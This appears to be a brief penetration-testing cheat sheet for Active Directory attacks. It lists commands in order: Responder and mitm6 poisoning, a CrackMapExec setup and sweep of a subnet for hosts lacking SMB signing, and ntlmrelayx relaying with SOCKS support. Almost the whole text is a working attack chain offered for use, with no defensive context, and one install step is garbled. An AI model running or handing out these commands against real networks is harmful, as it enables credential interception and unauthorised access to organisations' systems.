AD Attacks
1 - Running Responder
./Responder.py -I eth0
2 - Mitm6 (run simeltaneous to Responder)
mitm6 -i eth0
3 - CrackMapExec
Install first
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt update
sudo apt install python3.8 python3.8-dev python3.8-venv
python3.8 -m venv python3.8-venv
source python3.8-venv/bin/activate
pip install --upgrade
pip pip3 install crackmapexec
Run with 1 and 2 to grab Hosts with SMB signing as false:
crackmapexec smb 10.2.55.0/20 --gen-relay-list relay-hosts.txt | grep "False"
4 - Run Mitm6
mitm6 -d evil.corp
5 - Run Ntlmrelayx with Mitm6
Run with 5 together for relays:
ntlmrelayx.py -6 -socks -smb2support -tf relay-hosts.txt
Last updated
Was this helpful?